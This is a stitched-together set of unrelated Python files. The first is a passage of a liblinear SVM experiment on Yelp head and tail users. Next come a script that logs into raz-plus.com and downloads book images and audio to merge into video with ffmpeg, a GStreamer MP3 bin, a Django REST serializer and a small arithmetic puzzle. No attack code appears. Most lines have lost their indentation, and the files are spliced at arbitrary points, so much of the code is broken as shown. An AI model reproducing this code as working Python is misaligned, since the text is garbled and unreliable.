'p' + lambda_str[lambda_index + 1:]
r_str = str(para_r)
r_index = r_str.index('.')
r_str = r_str[0:r_index] + 'p' + r_str[r_index + 1:]
p_str = str(para_p)
p_index = p_str.index('.')
p_str = p_str[0:p_index] + 'p' + p_str[p_index + 1:]
q_str = str(para_q)
q_index = q_str.index('.')
q_str = q_str[0:q_index] + 'p' + q_str[q_index + 1:]
alpha_str = str(para_alpha)
alpha_index = alpha_str.index('.')
alpha_str = alpha_str[0:alpha_index] + 'p' + alpha_str[alpha_index + 1:]
bias_weight_str = str(para_bias_weight)
bias_weight_index = bias_weight_str.index('.')
bias_weight_str = bias_weight_str[0:bias_weight_index] + \
'p' + bias_weight_str[bias_weight_index + 1:]
input_dev_file = os.path.join(
data_path, 'SVM_dev_one_fifth_rd%d.txt' % (yelp_round))
# basename = os.path.basename(input_dev_file).split('.')[0]
basename = 'dev_rd%d' % (yelp_round)
if model_type == 'w2v':
c_file = os.path.join(model_path, 'C_%s_%s.txt' %
(model_type, basename))
elif model_type == 'swe':
c_file = os.path.join(model_path, 'C_%s_%s_l%s_r%s.txt' % (
model_type, basename, lambda_str, r_str))
elif model_type.startswith('swe_with_randomwalk') or model_type.startswith('swe_with_deepwalk'):
c_file = os.path.join(model_path, 'C_%s_%s_l%s_r%s_ph%d_pl%d.txt' % (
model_type, basename, lambda_str, r_str, para_path, para_path_length))
elif model_type.startswith('swe_with_node2vec') or model_type.startswith('swe_with_2nd_randomwalk'):
c_file = os.path.join(model_path, 'C_%s_%s_l%s_r%s_ph%d_pl%d_p%s_q%s.txt' % (
model_type, basename, lambda_str, r_str, para_path, para_path_length, p_str, q_str))
elif model_type.startswith('swe_with_bias_randomwalk'):
c_file = os.path.join(model_path, 'C_%s_%s_l%s_r%s_ph%d_pl%d_p%s_q%s_a%s_bw%s.txt' % (
model_type, basename, lambda_str, r_str, para_path, para_path_length, p_str, q_str, alpha_str, bias_weight_str))
if not os.path.isfile(c_file):
format_dev_file = SVM_format(model_type, input_dev_file, yelp_round, para_lambda,
para_r, para_path, para_path_length, para_p, para_q, para_alpha, para_bias_weight)
command = '../liblinear/train -n %d -C -v 5 -c %f %s | tee -a %s' % (
num_cores, begin_c, format_dev_file, c_file)
print(command)
with open(c_file, 'w') as fo:
fo.write(command + '\n')
os.system(command)
os.remove(format_dev_file)
return c_file
def get_head_tail_review(yelp_round):
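    # Split the training reviews into head/tail user files: users are sorted by
    # review count, and the most active users that together cover roughly half
    # of all reviews form the head set; all other known users go to the tail
    # file. Returns (head_file, tail_file).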
train_file = os.path.join(
data_path, 'SVM_train_one_fifth_rd%d.txt' % (yelp_round))
basename = 'train_rd%d' % (yelp_round)
user_file = os.path.join(data_path, 'user_file_rd%d.txt' % (yelp_round))
head_file = os.path.join(data_path, 'head_user_%s.txt' % (basename))
tail_file = os.path.join(data_path, 'tail_user_%s.txt' % (basename))
if not (os.path.isfile(head_file) and os.path.isfile(tail_file)):
user_df = pd.read_csv(user_file, header=None)
user_df.columns = ['user_id']
user_number = user_df.shape[0]
print("total %d users" % (user_number))
# count how many reviews of each user in training file, ignore unknown user
review_count_dict = dict()
def addKey(x, review_count_dict):
review_count_dict[x] = 0
user_df['user_id'].apply(addKey, args=(review_count_dict, ))
review_number = 0
with open(train_file, 'r') as f:
line = f.readline()
while line:
user_id = line.split('\t', 1)[0]
if user_id != 'unknown_user_id':
review_count_dict[user_id] += 1
review_number += 1
line = f.readline()
print("total %d reviews" % (review_number))
user_df['review_count'] = user_df['user_id'].apply(
review_count_dict.get)
head_users = set()
user_df_sorted = user_df.sort_values('review_count', ascending=False)
head_user_cnt = 0
review_cnt = 0
review_number_half = review_number // 2
for row in user_df_sorted.iterrows():
review_cnt += row[1]['review_count']
if (review_cnt < review_number_half):
head_user_cnt += 1
head_users.add(row[1]['user_id'])
else:
break
print("%d head user" % (head_user_cnt))
print("%d tail user" % (user_number - head_user_cnt))
f_head = open(head_file, 'w')
f_tail = open(tail_file, 'w')
with open(train_file, 'r') as f_train:
for line in f_train:
user_id = line.split('\t', 1)[0]
if user_id != 'unknown_user_id':
if user_id in head_users:
f_head.write(line)
else:
f_tail.write(line)
f_head.close()
f_tail.close()
return head_file, tail_file
def run_SVM_frac(user_train_files, model_type, factor, yelp_round, para_lambda, para_r, para_path, para_path_length, para_p, para_q, para_alpha, para_bias_weight):
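    # For each head/tail training file, train liblinear run_times times on a
    # random fraction `factor` of the formatted training data (using the best C
    # from tune_para_SVM), evaluate on the shared test split, and return an
    # accuracy matrix indexed as [user_type][run]. When factor == 1.0 only the
    # first run is trained; later runs reuse its model and result files.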
lambda_str = str(para_lambda)
lambda_index = lambda_str.index('.')
lambda_str = lambda_str[0:lambda_index] + \
'p' + lambda_str[lambda_index + 1:]
r_str = str(para_r)
r_index = r_str.index('.')
r_str = r_str[0:r_index] + 'p' + r_str[r_index + 1:]
p_str = str(para_p)
p_index = p_str.index('.')
p_str = p_str[0:p_index] + 'p' + p_str[p_index + 1:]
q_str = str(para_q)
q_index = q_str.index('.')
q_str = q_str[0:q_index] + 'p' + q_str[q_index + 1:]
alpha_str = str(para_alpha)
alpha_index = alpha_str.index('.')
alpha_str = alpha_str[0:alpha_index] + 'p' + alpha_str[alpha_index + 1:]
bias_weight_str = str(para_bias_weight)
bias_weight_index = bias_weight_str.index('.')
bias_weight_str = bias_weight_str[0:bias_weight_index] + \
'p' + bias_weight_str[bias_weight_index + 1:]
factor_str = str(factor)
factor_index = factor_str.index('.')
factor_str = factor_str[0:factor_index] + \
'p' + factor_str[factor_index + 1:]
c_file = tune_para_SVM(model_type, yelp_round, para_lambda, para_r, para_path,
para_path_length, para_p, para_q, para_alpha, para_bias_weight)
basename = os.path.basename(c_file).split('.')[0]
model_file = os.path.join(model_path, '%s.model' % (basename))
result_file = os.path.join(result_path, '%s.txt' % (basename))
para_c = 0.0
with open(c_file, 'r') as f:
para_c = float(f.readlines()[-1].split()[3])
test_file = os.path.join(
data_path, 'SVM_test_one_fifth_rd%d.txt' % (yelp_round))
format_test_file = SVM_format(model_type, test_file, yelp_round, para_lambda, para_r,
para_path, para_path_length, para_p, para_q, para_alpha, para_bias_weight)
# accuracy_array[i][r] means: user_type i, r-th accuracy
accuracy_array = [[0] * run_times for i in range(len(user_train_files))]
for i, input_train_file in enumerate(user_train_files):
basename = os.path.basename(input_train_file).split('_', 1)[0]
total = 0
with open(input_train_file, 'r') as f_tail:
for l, line in enumerate(f_tail):
total += 1
# print("%s_reviews %d" % (input_train_file.split('_', 1)[0], total))
format_train_file = SVM_format(model_type, input_train_file, yelp_round, para_lambda,
para_r, para_path, para_path_length, para_p, para_q, para_alpha, para_bias_weight)
for r in range(run_times):
if model_type == 'w2v':
random_train_file = os.path.join(data_path, 'R_%s_%s_rd%d_f%s_t%d.txt' % (
model_type, basename, yelp_round, factor_str, r))
model_file = os.path.join(model_path, '%s_%s_rd%d_f%s_t%d.model' % (
model_type, basename, yelp_round, factor_str, r))
result_file = os.path.join(result_path, '%s_%s_rd%d_f%s_t%d.txt' % (
model_type, basename, yelp_round, factor_str, r))
elif model_type == 'swe':
random_train_file = os.path.join(data_path, 'R_%s_%s_rd%d_l%s_r%s_f%s_t%d.txt' % (
model_type, basename, yelp_round, lambda_str, r_str, factor_str, r))
model_file = os.path.join(model_path, '%s_%s_rd%d_l%s_r%s_f%s_t%d.model' % (
model_type, basename, yelp_round, lambda_str, r_str, factor_str, r))
result_file = os.path.join(result_path, '%s_%s_rd%d_l%s_r%s_f%s_t%d.txt' % (
model_type, basename, yelp_round, lambda_str, r_str, factor_str, r))
elif model_type.startswith('swe_with_randomwalk') or model_type.startswith('swe_with_deepwalk'):
random_train_file = os.path.join(data_path, 'R_%s_%s_rd%d_l%s_r%s_ph%d_pl%d_f%s_t%d.txt' % (
model_type, basename, yelp_round, lambda_str, r_str, para_path, para_path_length, factor_str, r))
model_file = os.path.join(model_path, '%s_%s_rd%d_l%s_r%s_ph%d_pl%d_f%s_t%d.model' % (
model_type, basename, yelp_round, lambda_str, r_str, para_path, para_path_length, factor_str, r))
result_file = os.path.join(result_path, '%s_%s_rd%d_l%s_r%s_ph%d_pl%d_f%s_t%d.txt' % (
model_type, basename, yelp_round, lambda_str, r_str, para_path, para_path_length, factor_str, r))
elif model_type.startswith('swe_with_node2vec') or model_type.startswith('swe_with_2nd_randomwalk'):
random_train_file = os.path.join(data_path, 'R_%s_%s_rd%d_l%s_r%s_ph%d_pl%d_p%s_q%s_f%s_t%d.txt' % (
model_type, basename, yelp_round, lambda_str, r_str, para_path, para_path_length, p_str, q_str, factor_str, r))
model_file = os.path.join(model_path, '%s_%s_rd%d_l%s_r%s_ph%d_pl%d_p%s_q%s_f%s_t%d.model' % (
model_type, basename, yelp_round, lambda_str, r_str, para_path, para_path_length, p_str, q_str, factor_str, r))
result_file = os.path.join(result_path, '%s_%s_rd%d_l%s_r%s_ph%d_pl%d_p%s_q%s_f%s_t%d.txt' % (
model_type, basename, yelp_round, lambda_str, r_str, para_path, para_path_length, p_str, q_str, factor_str, r))
elif model_type.startswith('swe_with_bias_randomwalk'):
random_train_file = os.path.join(data_path, 'R_%s_%s_rd%d_l%s_r%s_ph%d_pl%d_p%s_q%s_a%s_bw%s_f%s_t%d.txt' % (
model_type, basename, yelp_round, lambda_str, r_str, para_path, para_path_length, p_str, q_str, alpha_str, bias_weight_str, factor_str, r))
model_file = os.path.join(model_path, '%s_%s_rd%d_l%s_r%s_ph%d_pl%d_p%s_q%s_a%s_bw%s_f%s_t%d.model' % (
model_type, basename, yelp_round, lambda_str, r_str, para_path, para_path_length, p_str, q_str, alpha_str, bias_weight_str, factor_str, r))
result_file = os.path.join(result_path, '%s_%s_rd%d_l%s_r%s_ph%d_pl%d_p%s_q%s_a%s_bw%s_f%s_t%d.txt' % (
model_type, basename, yelp_round, lambda_str, r_str, para_path, para_path_length, p_str, q_str, alpha_str, bias_weight_str, factor_str, r))
if r > 0 and factor == 1.0:
full_model_file = '%s0.model' % (
os.path.splitext(model_file)[0][:-1])
full_result_file = '%s0.txt' % (
os.path.splitext(result_file)[0][:-1])
with open(model_file, 'w') as fw:
with open(full_model_file, 'r') as fr:
line = fr.readline()
while line:
fw.write('%s' % (line))
line = fr.readline()
with open(result_file, 'w') as fw:
with open(full_result_file, 'r') as fr:
line = fr.readline()
while line:
fw.write('%s' % (line))
line = fr.readline()
if not os.path.isfile(result_file):
if not os.path.isfile(model_file):
if not os.path.isfile(random_train_file):
random_index = np.random.permutation(total)
random_index = set(random_index[0:int(total * factor)])
                        with open(random_train_file, 'w') as fw:
                            with open(format_train_file, 'r') as fr:
                                for l, line in enumerate(fr):
                                    if l in random_index:
                                        fw.write(line)
command = '../liblinear/train -n %d -c %f %s %s > /dev/null' % (
num_cores, para_c, random_train_file, model_file)
print(command)
os.system(command)
os.remove(random_train_file)
command = '../liblinear/predict %s %s /dev/null | tee %s' % (
format_test_file, model_file, result_file)
print(command)
os.system(command)
with open(result_file, 'r') as f:
accuracy_array[i][r] = float(f.readline().split()[-2][:-1])
# os.remove(format_test_file)
return accuracy_array
def store_std_mean(accuracy_array, model_type, factor, yelp_round, para_lambda, para_r, para_path, para_path_length, para_p, para_q, para_alpha, para_bias_weight):
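    # Compute the mean and standard deviation of the head and tail accuracies
    # for one (model_type, factor) setting and write them to *_std_*.txt and
    # *_mean_*.txt files under result_path.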
lambda_str = str(para_lambda)
lambda_index = lambda_str.index('.')
lambda_str = lambda_str[0:lambda_index] + \
'p' + lambda_str[lambda_index + 1:]
r_str = str(para_r)
r_index = r_str.index('.')
r_str = r_str[0:r_index] + 'p' + r_str[r_index + 1:]
p_str = str(para_p)
p_index = p_str.index('.')
p_str = p_str[0:p_index] + 'p' + p_str[p_index + 1:]
q_str = str(para_q)
q_index = q_str.index('.')
q_str = q_str[0:q_index] + 'p' + q_str[q_index + 1:]
alpha_str = str(para_alpha)
alpha_index = alpha_str.index('.')
alpha_str = alpha_str[0:alpha_index] + 'p' + alpha_str[alpha_index + 1:]
bias_weight_str = str(para_bias_weight)
bias_weight_index = bias_weight_str.index('.')
bias_weight_str = bias_weight_str[0:bias_weight_index] + \
'p' + bias_weight_str[bias_weight_index + 1:]
factor_str = str(factor)
factor_index = factor_str.index('.')
factor_str = factor_str[0:factor_index] + \
'p' + factor_str[factor_index + 1:]
head_std = np.std(accuracy_array[0])
head_mean = np.mean(accuracy_array[0])
tail_std = np.std(accuracy_array[1])
tail_mean = np.mean(accuracy_array[1])
# print('model_type: %s\tyelp_round: %d\tlambda: %f\tr: %f\talpha: %f\n' % (model_type, yelp_round, para_lambda, para_r, para_alpha))
# print('\thead_std: %f' % head_std)
# print('\thead_mean: %f' % head_mean)
# print('\ttail_std: %f' % tail_std)
# print('\ttail_mean: %f' % tail_mean)
if model_type == 'w2v':
std_file = os.path.join(result_path, '%s_head_tail_std_rd%d_f%s.txt' % (
model_type, yelp_round, factor_str))
mean_file = os.path.join(result_path, '%s_head_tail_mean_rd%d_f%s.txt' % (
model_type, yelp_round, factor_str))
elif model_type == 'swe':
std_file = os.path.join(result_path, '%s_head_tail_std_rd%d_l%s_r%s_f%s.txt' % (
model_type, yelp_round, lambda_str, r_str, factor_str))
mean_file = os.path.join(result_path, '%s_head_tail_mean_rd%d_l%s_r%s_f%s.txt' % (
model_type, yelp_round, lambda_str, r_str, factor_str))
elif model_type.startswith('swe_with_randomwalk') or model_type.startswith('swe_with_deepwalk'):
std_file = os.path.join(result_path, '%s_head_tail_std_rd%d_l%s_r%s_ph%d_pl%d_f%s.txt' % (
model_type, yelp_round, lambda_str, r_str, para_path, para_path_length, factor_str))
mean_file = os.path.join(result_path, '%s_head_tail_mean_rd%d_l%s_r%s_ph%d_pl%d_f%s.txt' % (
model_type, yelp_round, lambda_str, r_str, para_path, para_path_length, factor_str))
elif model_type.startswith('swe_with_node2vec') or model_type.startswith('swe_with_2nd_randomwalk'):
std_file = os.path.join(result_path, '%s_head_tail_std_rd%d_l%s_r%s_ph%d_pl%d_p%s_q%s_f%s.txt' % (
model_type, yelp_round, lambda_str, r_str, para_path, para_path_length, p_str, q_str, factor_str))
mean_file = os.path.join(result_path, '%s_head_tail_mean_rd%d_l%s_r%s_ph%d_pl%d_p%s_q%s_f%s.txt' % (
model_type, yelp_round, lambda_str, r_str, para_path, para_path_length, p_str, q_str, factor_str))
elif model_type.startswith('swe_with_bias_randomwalk'):
std_file = os.path.join(result_path, '%s_head_tail_std_rd%d_l%s_r%s_ph%d_pl%d_p%s_q%s_a%s_bw%s_f%s.txt' % (
model_type, yelp_round, lambda_str, r_str, para_path, para_path_length, p_str, q_str, alpha_str, bias_weight_str, factor_str))
mean_file = os.path.join(result_path, '%s_head_tail_mean_rd%d_l%s_r%s_ph%d_pl%d_p%s_q%s_a%s_bw%s_f%s.txt' % (
model_type, yelp_round, lambda_str, r_str, para_path, para_path_length, p_str, q_str, alpha_str, bias_weight_str, factor_str))
with open(std_file, 'w') as f:
f.write('head_std: %f\n' % head_std)
f.write('tail_std: %f\n' % tail_std)
with open(mean_file, 'w') as f:
f.write('head_mean: %f\n' % head_mean)
f.write('tail_mean: %f\n' % tail_mean)
def print_results(yelp_round, para_lambda, para_r, para_path, para_path_length, para_p, para_q, para_alpha, para_bias_weight):
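    # Gather the per-fraction std/mean files for every model type into two
    # PrettyTable summaries (head users and tail users, one column per training
    # fraction) and append them to results/head_tail_result.txt.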
lambda_str = str(para_lambda)
lambda_index = lambda_str.index('.')
lambda_str = lambda_str[0:lambda_index] + \
'p' + lambda_str[lambda_index + 1:]
r_str = str(para_r)
r_index = r_str.index('.')
r_str = r_str[0:r_index] + 'p' + r_str[r_index + 1:]
p_str = str(para_p)
p_index = p_str.index('.')
p_str = p_str[0:p_index] + 'p' + p_str[p_index + 1:]
q_str = str(para_q)
q_index = q_str.index('.')
q_str = q_str[0:q_index] + 'p' + q_str[q_index + 1:]
alpha_str = str(para_alpha)
alpha_index = alpha_str.index('.')
alpha_str = alpha_str[0:alpha_index] + 'p' + alpha_str[alpha_index + 1:]
bias_weight_str = str(para_bias_weight)
bias_weight_index = bias_weight_str.index('.')
bias_weight_str = bias_weight_str[0:bias_weight_index] + \
'p' + bias_weight_str[bias_weight_index + 1:]
table_file = os.path.join(result_path, 'head_tail_result.txt')
col, row = len(factor_array), len(model_types) * 4
# head-std
# head-mean
# tail-std
# tail-mean
result_matrix = [['' for x in range(col)] for y in range(row)]
head_tail_column = []
for i, model_type in enumerate(model_types):
head_tail_column.append('%s-std' % model_type)
head_tail_column.append('%s-mean' % model_type)
if model_type == 'w2v':
std_basename = '%s_head_tail_std_rd%d' % (model_type, yelp_round)
mean_basename = '%s_head_tail_mean_rd%d' % (model_type, yelp_round)
elif model_type == 'swe':
std_basename = '%s_head_tail_std_rd%d_l%s_r%s' % (
model_type, yelp_round, lambda_str, r_str)
mean_basename = '%s_head_tail_mean_rd%d_l%s_r%s' % (
model_type, yelp_round, lambda_str, r_str)
elif model_type.startswith('swe_with_randomwalk') or model_type.startswith('swe_with_deepwalk'):
std_basename = '%s_head_tail_std_rd%d_l%s_r%s_ph%d_pl%d' % (
model_type, yelp_round, lambda_str, r_str, para_path, para_path_length)
mean_basename = '%s_head_tail_mean_rd%d_l%s_r%s_ph%d_pl%d' % (
model_type, yelp_round, lambda_str, r_str, para_path, para_path_length)
elif model_type.startswith('swe_with_node2vec') or model_type.startswith('swe_with_2nd_randomwalk'):
std_basename = '%s_head_tail_std_rd%d_l%s_r%s_ph%d_pl%d_p%s_q%s' % (
model_type, yelp_round, lambda_str, r_str, para_path, para_path_length, p_str, q_str)
mean_basename = '%s_head_tail_mean_rd%d_l%s_r%s_ph%d_pl%d_p%s_q%s' % (
model_type, yelp_round, lambda_str, r_str, para_path, para_path_length, p_str, q_str)
elif model_type.startswith('swe_with_bias_randomwalk'):
std_basename = '%s_head_tail_std_rd%d_l%s_r%s_ph%d_pl%d_p%s_q%s_a%s_bw%s' % (
model_type, yelp_round, lambda_str, r_str, para_path, para_path_length, p_str, q_str, alpha_str, bias_weight_str)
mean_basename = '%s_head_tail_mean_rd%d_l%s_r%s_ph%d_pl%d_p%s_q%s_a%s_bw%s' % (
model_type, yelp_round, lambda_str, r_str, para_path, para_path_length, p_str, q_str, alpha_str, bias_weight_str)
for j, factor in enumerate(factor_array):
factor_str = str(factor)
factor_index = factor_str.index('.')
factor_str = factor_str[0:factor_index] + \
'p' + factor_str[factor_index + 1:]
std_file = os.path.join(result_path, '%s_f%s.txt' %
(std_basename, factor_str))
mean_file = os.path.join(
result_path, '%s_f%s.txt' % (mean_basename, factor_str))
with open(std_file, 'r') as f:
lines = f.readlines()
result_matrix[i * 4 + 0][j] = lines[0].split()[1]
result_matrix[i * 4 + 2][j] = lines[1].split()[1]
with open(mean_file, 'r') as f:
lines = f.readlines()
result_matrix[i * 4 + 1][j] = lines[0].split()[1]
result_matrix[i * 4 + 3][j] = lines[1].split()[1]
table = PrettyTable()
table.add_column("Head", head_tail_column)
for j, f in enumerate(factor_array):
field = '%d%%' % (f * 100)
head_column = []
for i in range(len(model_types)):
head_column.append(result_matrix[4 * i + 0][j])
head_column.append(result_matrix[4 * i + 1][j])
table.add_column(field, head_column)
print('yelp_round: %d\tlambda: %f\tr: %f\tpath: %d\tpath_length: %d\tp: %f\tq: %f\talpha: %f\tbias_weight: %f\n' % (
yelp_round, para_lambda, para_r, para_path, para_path_length, para_p, para_q, para_alpha, para_bias_weight))
print(table)
table_txt = table.get_string()
with open(table_file, 'a+') as f:
f.write('yelp_round: %d\tlambda: %f\tr: %f\tpath: %d\tpath_length: %d\tp: %f\tq: %f\talpha: %f\tbias_weight: %f\n' % (
yelp_round, para_lambda, para_r, para_path, para_path_length, para_p, para_q, para_alpha, para_bias_weight))
        f.write(table_txt)
f.write('\n\n\n')
table = PrettyTable()
table.add_column("tail", head_tail_column)
for j, f in enumerate(factor_array):
field = '%d%%' % (f * 100)
tail_column = []
for i in range(len(model_types)):
tail_column.append(result_matrix[4 * i + 2][j])
tail_column.append(result_matrix[4 * i + 3][j])
table.add_column(field, tail_column)
print('yelp_round: %d\tlambda: %f\tr: %f\tpath: %d\tpath_length: %d\tp: %f\tq: %f\talpha: %f\tbias_weight: %f\n' % (
yelp_round, para_lambda, para_r, para_path, para_path_length, para_p, para_q, para_alpha, para_bias_weight))
print(table)
table_txt = table.get_string()
with open(table_file, 'a+') as f:
f.write('yelp_round: %d\tlambda: %f\tr: %f\tpath: %d\tpath_length: %d\tp: %f\tq: %f\talpha: %f\tbias_weight: %f\n' % (
yelp_round, para_lambda, para_r, para_path, para_path_length, para_p, para_q, para_alpha, para_bias_weight))
        f.write(table_txt)
f.write('\n\n\n')
#-------------------------------------------------------------
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description='Sentiment Classification on head and tail users using liblinear')
parser.add_argument('--yelp_round', default=9, type=int,
choices={9, 10}, help="The round number of yelp data")
parser.add_argument('--para_lambda', default=1.0, type=float,
help='The trade off parameter between log-likelihood and regularization term')
parser.add_argument('--para_r', default=1.0, type=float,
help="The constraint of the L2-norm")
parser.add_argument('--para_path', default=100, type=int,
help="The number of random walk paths for every review")
parser.add_argument('--para_path_length', default=10, type=int,
help="The length of random walk paths for every review")
parser.add_argument('--para_p', default=1.0, type=float,
help="The return parameter for the second-order random walk")
parser.add_argument('--para_q', default=1.0, type=float,
help="The in-out parameter for the second-order random walk")
parser.add_argument('--para_alpha', default=0.02, type=float,
help="The restart parameter for the bias random walk")
parser.add_argument('--para_bias_weight', default=0.2,
type=float, help="The bias parameter for the bias random walk")
args = parser.parse_args()
parser.print_help()
user_train_files = get_head_tail_review(args.yelp_round)
for model_type in model_types:
for frac in factor_array:
accuracy_array = run_SVM_frac(user_train_files, model_type, frac, args.yelp_round, args.para_lambda, args.para_r,
args.para_path, args.para_path_length, args.para_p, args.para_q, args.para_alpha, args.para_bias_weight)
store_std_mean(accuracy_array, model_type, frac, args.yelp_round, args.para_lambda, args.para_r,
args.para_path, args.para_path_length, args.para_p, args.para_q, args.para_alpha, args.para_bias_weight)
print_results(args.yelp_round, args.para_lambda, args.para_r, args.para_path,
args.para_path_length, args.para_p, args.para_q, args.para_alpha, args.para_bias_weight)
|
import re
import shutil
import subprocess
import sys
from pathlib import Path
import requests
class RazPlus(object):
def __init__(self, username, password):
self.username = username
        self.password = password
def login(self):
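        # Log in to raz-plus.com with the stored credentials and return the
        # authenticated requests.Session; prints the error and exits on failure.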
s = requests.Session()
try:
r = s.post('https://www.raz-plus.com/auth/login.php',
data={
'username': self.username,
                           'password': self.password
},
allow_redirects=True)
if 'error' in r.url:
raise Exception('Login failed!')
if r.status_code == 200:
return s
else:
raise Exception('Bad Response!')
except Exception as e:
print(e)
exit(1)
class LVB(object):
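    # Page numbers whose narration mp3 downloaded successfully; filled by
    # download() and consumed when pairing audio with page images.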
real_mp3_list = []
def __init__(self, session, id):
self.session = session
self.id = id
def get_images_and_audios(self):
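        # Fetch the projectable book page, parse the displayed page numbers and
        # the audio title slug, then download the page JPG images and the
        # per-page narration MP3s.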
rs = self.session.get(
'https://www.raz-plus.com/projectable/book.php?id={}&lang=1&type=book'
.format(self.id))
match_displayPages = re.findall(r"var displayPages = \[.*\]", rs.text)
if re.findall(r"var bookAudioContent = {\"error\":\"invalid_book\"}",
rs.text):
            raise Exception("Invalid Book")
page_number_list = match_displayPages[0].split('= ')[-1].strip(
'[').strip(']').strip('0,').split(',')[2:]
mp3_title = re.findall(
r"raz_.*_title_text.mp3",
rs.text)[0].split('raz_')[-1].split('_title_text.mp3')[0]
download(
'https://cf.content.raz-plus.com/raz_book_image/{}/projectable/large/1/book/page-{}.jpg',
page_number_list, self.session, self.id, 'jpg')
download(
'https://cf.content.raz-plus.com/audio/{}/raz_{}_p{}_text.mp3'.
format("{}", mp3_title.lower(),
"{}"), page_number_list, self.session, self.id, 'mp3')
def concat_audios_and_images(self):
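        # Pair each downloaded page image with its narration MP3 via ffmpeg,
        # producing one <page>.mp4 clip per successfully downloaded page.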
for i in LVB.real_mp3_list:
subprocess.run(
'ffmpeg -loop 1 -i {}.jpg -i {}.mp3 -vf "pad=ceil(iw/2)*2:ceil(ih/2)*2" -c:v libx264 -x264-params keyint=1:scenecut=0 -c:a copy -shortest {}.mp4'
.format(i, i, i),
shell=True,
check=True)
def concat_videos(self):
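        # Pad every page clip with two seconds of trailing audio, list the
        # padded copies in page order in mylist.txt, and concatenate them into
        # output.mp4 with ffmpeg.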
mp4_list = []
basepath = Path('.')
files_in_basepath = (entry for entry in basepath.iterdir()
if entry.is_file())
for item in files_in_basepath:
if '.mp4' in item.name:
mp4_list.append(item.name)
for i in mp4_list:
subprocess.run(
'ffmpeg -y -i {} -filter_complex "[0:a]apad=pad_dur=2[a]" -map 0:v -map "[a]" -c:v copy _{}'
.format(i, i),
shell=True,
check=True)
mp4_list.sort(key=fn)
with open('mylist.txt', 'w') as writer:
for i in mp4_list:
writer.write("file '_{}'\n".format(i))
subprocess.run(
"ffmpeg -safe 0 -f concat -i 'mylist.txt' -c copy output.mp4",
shell=True,
check=True)
def fn(e):
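    # Sort key: numeric page index parsed from a "<page>.mp4" file name.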
return int(e.split('.')[0])
def download(url, page_list, session, book_id, ext):
    # Stream each page asset to disk as "<page>.<ext>"; page numbers whose mp3
    # downloaded successfully are recorded for the later audio/video muxing.
    for i in page_list:
        try:
            r = session.get(url.format(book_id, i), stream=True)
            if r.status_code == 200:
                with open('{}.{}'.format(i, ext), 'wb') as f:
                    r.raw.decode_content = True
                    shutil.copyfileobj(r.raw, f)
                if ext == 'mp3':
                    LVB.real_mp3_list.append(i)
            else:
                print(url.format(book_id, i) + ": " + str(r.status_code))
        except Exception as e:
            print(e)
if __name__ == '__main__':
lvb_id = sys.argv[1]
lvb_username = sys.argv[2]
lvb_password = sys.argv[3]
razplus = RazPlus(lvb_username, lvb_password)
s = razplus.login()
lvb = LVB(s, lvb_id)
lvb.get_images_and_audios()
lvb.concat_audios_and_images()
lvb.concat_videos()
|
# -*- coding: utf-8 -*-
import gst
import gtk
class SongBin(gst.Bin):
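    # Audio bin that chains filesrc -> mad (MP3 decode) -> audioconvert for the
    # given file and exposes the converter's src pad as a ghost pad
    # (pygst 0.10-style API).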
def __init__(self, song_path):
gst.Bin.__init__(self)
self.source = gst.element_factory_make("filesrc", "file-source")
self.decoder = gst.element_factory_make("mad", "mp3-decoder")
self.conv = gst.element_factory_make("audioconvert", "converter")
self.source.set_property("location", song_path)
self.add(self.source, self.decoder, self.conv)
gst.element_link_many(self.source, self.decoder, self.conv)
self.src_pad = gst.GhostPad("src", self.conv.get_pad("src"))
self.add_pad(self.src_pad)
|
from .models import campaign
from rest_framework import serializers
class campaignSerializer(serializers.ModelSerializer):
class Meta:
model = campaign
        fields = ['id', 'title', 'description', 'identifier', 'additionalData']
|
# Difference between the square of the sum and the sum of the squares of 1..100.
t, ans = list(range(1, 101)), 0
for i in t:
    ans += i * i  # accumulate the sum of squares
print(sum(t) * sum(t) - ans)
|